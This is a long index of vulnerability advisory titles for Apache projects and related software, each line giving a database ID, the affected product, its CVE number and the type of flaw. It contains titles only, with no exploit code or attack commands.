13171| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
13172| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
13173| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
13174| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
13175| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
13176| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
13177| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
13178| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
13179| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
13180| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
13181| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
13182| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
13183| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
13184| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
13185| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
13186| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
13187| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
13188| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
13189| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
13190| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
13191| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
13192| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
13193| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
13194| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
13195| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
13196| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
13197| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
13198| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
13199| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
13200| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
13201| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
13202| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
13203| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
13204| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
13205| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
13206| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
13207| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
13208| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
13209| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
13210| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
13211| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
13212| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
13213| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
13214| [95675] Apache Struts Remote Code Execution Vulnerability
13215| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
13216| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
13217| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
13218| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
13219| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
13220| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
13221| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
13222| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
13223| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
13224| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
13225| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
13226| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
13227| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
13228| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
13229| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
13230| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
13231| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
13232| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
13233| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
13234| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
13235| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
13236| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
13237| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
13238| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
13239| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
13240| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
13241| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
13242| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
13243| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
13244| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
13245| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
13246| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
13247| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
13248| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
13249| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
13250| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
13251| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
13252| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
13253| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
13254| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
13255| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
13256| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
13257| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
13258| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
13259| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
13260| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
13261| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
13262| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
13263| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
13264| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
13265| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
13266| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
13267| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
13268| [91736] Apache XML-RPC Multiple Security Vulnerabilities
13269| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
13270| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
13271| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
13272| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
13273| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
13274| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
13275| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
13276| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
13277| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
13278| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
13279| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
13280| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
13281| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
13282| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
13283| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
13284| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
13285| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
13286| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
13287| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
13288| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
13289| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
13290| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
13291| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
13292| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
13293| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
13294| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
13295| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
13296| [90482] Apache CVE-2004-1387 Local Security Vulnerability
13297| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
13298| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
13299| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
13300| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
13301| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
13302| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
13303| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
13304| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
13305| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
13306| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
13307| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
13308| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
13309| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
13310| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
13311| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
13312| [86399] Apache CVE-2007-1743 Local Security Vulnerability
13313| [86397] Apache CVE-2007-1742 Local Security Vulnerability
13314| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
13315| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
13316| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
13317| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
13318| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
13319| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
13320| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
13321| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
13322| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
13323| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
13324| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
13325| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
13326| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
13327| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
13328| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
13329| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
13330| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
13331| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
13332| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
13333| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
13334| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
13335| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
13336| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
13337| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
13338| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
13339| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
13340| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
13341| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
13342| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
13343| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
13344| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
13345| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
13346| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
13347| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
13348| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
13349| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
13350| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
13351| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
13352| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
13353| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
13354| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
13355| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
13356| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
13357| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
13358| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
13359| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
13360| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
13361| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
13362| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
13363| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
13364| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
13365| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
13366| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
13367| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
13368| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
13369| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
13370| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
13371| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
13372| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
13373| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
13374| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
13375| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
13376| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
13377| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
13378| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
13379| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
13380| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
13381| [76933] Apache James Server Unspecified Command Execution Vulnerability
13382| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
13383| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
13384| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
13385| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
13386| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
13387| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
13388| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
13389| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
13390| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
13391| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
13392| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
13393| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
13394| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
13395| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
13396| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
13397| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
13398| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
13399| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
13400| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
13401| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
13402| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
13403| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
13404| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
13405| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
13406| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
13407| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
13408| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
13409| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
13410| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
13411| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
13412| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
13413| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
13414| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
13415| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
13416| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
13417| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
13418| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
13419| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
13420| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
13421| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
13422| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
13423| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
13424| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
13425| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
13426| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
13427| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
13428| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
13429| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
13430| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
13431| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
13432| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
13433| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
13434| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
13435| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
13436| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
13437| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
13438| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
13439| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
13440| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
13441| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
13442| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
13443| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
13444| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
13445| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
13446| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
13447| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
13448| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
13449| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
13450| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
13451| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
13452| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
13453| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
13454| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
13455| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
13456| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
13457| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
13458| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
13459| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
13460| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
13461| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
13462| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
13463| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
13464| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
13465| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
13466| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
13467| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
13468| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
13469| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
13470| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
13471| [68229] Apache Harmony PRNG Entropy Weakness
13472| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
13473| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
13474| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
13475| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
13476| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
13477| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
13478| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
13479| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
13480| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
13481| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
13482| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
13483| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
13484| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
13485| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
13486| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
13487| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
13488| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
13489| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
13490| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
13491| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
13492| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
13493| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
13494| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
13495| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
13496| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
13497| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
13498| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
13499| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
13500| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
13501| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
13502| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
13503| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
13504| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
13505| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
13506| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
13507| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
13508| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
13509| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
13510| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
13511| [64780] Apache CloudStack Unauthorized Access Vulnerability
13512| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
13513| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
13514| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
13515| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
13516| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
13517| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
13518| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
13519| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
13520| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
13521| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
13522| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
13523| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
13524| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
13525| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
13526| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
13527| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
13528| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
13529| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
13530| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
13531| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
13532| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
13533| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
13534| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
13535| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
13536| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
13537| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
13538| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
13539| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
